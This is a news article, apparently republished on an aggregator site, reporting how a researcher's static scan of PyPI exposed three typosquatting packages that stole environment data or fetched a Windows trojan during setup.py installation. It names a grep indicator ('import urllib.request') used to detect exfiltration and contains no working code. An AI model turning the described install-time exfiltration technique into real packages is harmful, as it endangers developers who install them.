Connect with us

Hi, what are you looking for?

Hard News Hard Hitting News Source Global Political News

Cyber Security

PyPI admins remove three malicious packages after more than 10,000 downloads

The Python Package Index (PyPI) has removed malware-deploying and data-stealing packages that were collectively downloaded thousands of times.

The trio of malicious packages duped unsuspecting users by typosquatting the names of legitimate packages.

‘Good reputation’

In the case of two packages that exfiltrated data from compromised systems, the number of downloads was also potentially inflated by how the authors deceptively burnished their credibility.

“Both of these packages included their source code URL as an existing popular library, so anyone browsing to the package in PyPI or analyzing how popular the library was would see a large number of GitHub stars and forks – indicating a good reputation,” said Andrew Scott, maintainer of Python security project Ochrona Security, in a Medium blog post.

Uploaded by the same user, the two packages – ‘dpp-client’ and ‘dpp-client1234’ – appeared to target users of Apache Mesos, which is used to manage computer clusters.

They were uploaded onto PyPI in February 2021, after which dpp-client was downloaded more than 10,000 times, including more than 600 downloads in the last month alone.

Scott thanked the Python security team for removing the packages promptly on December 13, the same day he notified them.

A third, Trojan-smuggling package dubbed ‘aws-login0tool’ notched roughly 600 downloads between surfacing on PyPI on December 1 and its removal when PyPI admins were alerted on December 10.

Malicious operandi

All three packages were identified as potentially malicious via the import urllib.request string, “since this is commonly used to exfiltrate data or download malicious files”, said Scott.

The data-stealing pair gathered environment variables and file listings, apparently seeking Apache Mesos-related files, and relayed them “to an unknown web service”.

The aws-login0tool performed a standard package install, before fetching an .exe file “from a nondescript domain” and attempting to execute the file, a known Windows trojan.

The package was flagged in multiple text searches in setup.py, a common location for malicious code in Python packages since arbitrary code can be executed there at install time, said Scott.

Python probing

The findings emerged from a static analysis of around 200,000 PyPI packages – approaching two-thirds of the total – after downloading them with Bandersnatch.

He extracted the packages by creating “a pretty simple Python script to recursively iterate through Bandersnatch’s somewhat complicated folder structure then decompressed and extracted each sdist, egg, or wheel out to a flat directory”.

“Once extracted I ran a number of string and regex searches using grep, then manually reviewed the results,” said Scott.

Advertisement. Scroll to continue reading.

This technique also uncovered a minor vulnerability in an open source package developed by a commercial vendor.

Scott said he intended to update and refine his package analysis and would later publish additional findings.

Source: https://portswigger.net/daily-swig/pypi-admins-remove-three-malicious-packages-after-more-than-10-000-downloads

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like

Cyber Security

Telegram Messenger offers global, cloud-based instant messaging with several features:- Cybersecurity researchers at Securlist recently found several Telegram mods on Google Play in various...

Cyber Security

AttackCrypt, an open-source “crypter,” was recently used by cybercriminals to hide malware binaries and avoid antivirus detection. A crypter is a kind of software that can...

Cyber Security

We are glad to present the most recent news on cybersecurity in this week’s Threat and Vulnerability Roundup from Cyber Writes.  The latest attack...

Cyber Security

The cybercrime group evaded remediation efforts by installing persistent backdoors and deploying “new and novel malware.” A Chinese-linked hacking group that security researchers say...

Copyright © 2023 Hard News Herd Hitting in Your Face News Source | World News | Breaking News | US News | Political News Website by Top Search SEO